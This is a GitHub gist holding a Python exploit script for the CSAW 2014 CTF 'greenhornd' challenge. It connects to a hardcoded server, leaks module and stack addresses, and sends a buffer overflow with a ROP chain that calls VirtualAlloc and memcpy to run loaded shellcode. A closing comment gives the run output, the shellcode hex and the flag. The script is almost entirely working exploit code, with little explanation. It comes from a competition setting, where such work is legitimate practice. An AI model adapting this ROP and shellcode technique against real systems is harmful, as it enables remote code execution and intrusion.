Created
September 21, 2014 22:05
-
-
Save g05u/221b61d13804c5fd87d0 to your computer and use it in GitHub Desktop.
Exploit greenhornd CSAW 2014 CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import struct, sys, time | |
| from nulllife import * | |
| #CSAW 2014 CTF | |
| #greenhorn exploit | |
| offset_data = 0x3F8 | |
| s = NullSocket("54.164.253.42", 9998) | |
| s.readuntil("Password: ") | |
| s.writeline("GreenhornSecretPassword!!!") | |
| s.readuntil("Selection: ") | |
| s.writeline("a\n") | |
| s.readuntil("is: 0x") | |
| leak_module = int(s.read(8), 16) | |
| print '[!] leak module: 0x%08X' % leak_module | |
| s.readuntil("at: 0x") | |
| leak_stack = int(s.read(8), 16) | |
| print '[!] leak stack: 0x%08X' % leak_stack | |
| s.readuntil("Selection: ") | |
| s.writeline("V") | |
| s.readuntil("(with some constraints).\n\n") | |
| address_clean_4args = leak_module + 0x0040199e | |
| address_payload = leak_stack - offset_data | |
| address_new_ebp = address_payload + 0x500 | |
| shellcode = open('scgreen', 'rb').read() | |
| print '[!] Shellcode: ' + shellcode.encode('hex') | |
| shellcode = shellcode.replace("\xD0\x14\x40\x00", pack(leak_module + 0x0401460)) | |
| payload = "CSAW" | |
| payload += ("\x90" * 32) + shellcode | |
| payload += "A" * (0x400 - len(payload)) | |
| payload += pack(address_new_ebp) #new ebp | |
| ###call VirtualAlloc | |
| payload += pack(leak_module + 0x004011C0) # call ds:VirtualAlloc | |
| payload += pack(address_clean_4args) | |
| payload += pack(0) #lpAddress | |
| payload += pack(0x1000) #size | |
| payload += pack(0x40) #flprotect | |
| payload += pack(address_new_ebp + 0x8) #void * | |
| ###restore ebp | |
| payload += pack(leak_module + 0x00401512) #pop ebp; retn | |
| payload += pack(address_new_ebp) | |
| ###call memcpy | |
| payload += pack(leak_module + 0x004011F3) #push args from ebp and call memcpy | |
| payload += pack(address_new_ebp) #still ebp | |
| ###call shellcode | |
| payload += pack(leak_module + 0x00401C75) #pop esi | |
| payload += pack(address_new_ebp + 0x08) | |
| payload += pack(leak_module + 0x00401C65) #mov eax, [esi] ... call eax | |
| payload += "B" * (0x500 - len(payload)) | |
| payload += "CCCC" | |
| payload += "DDDD" | |
| ###args for memcpy | |
| payload += "EEEE" #ebp + 0x8 | |
| payload += pack(address_payload + 4) #ebp + 0xC = address_shellcode | |
| payload += pack(0x200) #ebp +0x10 | |
| s.writeline(payload) | |
| print s.readuntil("}") | |
| ''' | |
| $ python green.py | |
| [!] leak module: 0xFFE50000 | |
| [!] leak stack: 0x001EF49C | |
| [!] Shellcode: e8000000005b8db389010000568db38101000056680200000068884e0d00e86a0000006800000000688000000068030000006800000000680100000068000000808d839101000050ff93890100008985f8fbffff68000000008d85fcfbffff5068000100008d8500fcffff508b85f8fbffff50ff938d0100008d8500fcffff680001000050b8d0144000ffd0c35589e55156578b4d0c8b75108b7d14ff36ff7508e819000000890781c70400000081c604000000e2e65f5e5989ec5dc210005589e55356575164ff3530000000588b400c8b480c8b118b413068020000008b7d085750e86a00000085c0740789d1e9e1ffffff8b4118508b583c01d88b5878585001c38b4b1c8b53208b5b2401c101c201c38b32585001c66801000000ff750c56e82c00000085c0741181c20400000081c302000000e9d7ffffff5831d2668b13c1e20201d10301595f5e5b89ec5dc208005589e551535231c931db31d28b45088a1080ca6001d3d1e30345108a0884c9e0ee31c08b4d0c39cb7401405a5b5989ec5dc20c004677060062d5000000000000000000006b657900 | |
| key{He may be angry all the time, but he's the only one that understand Windows DACLs} | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment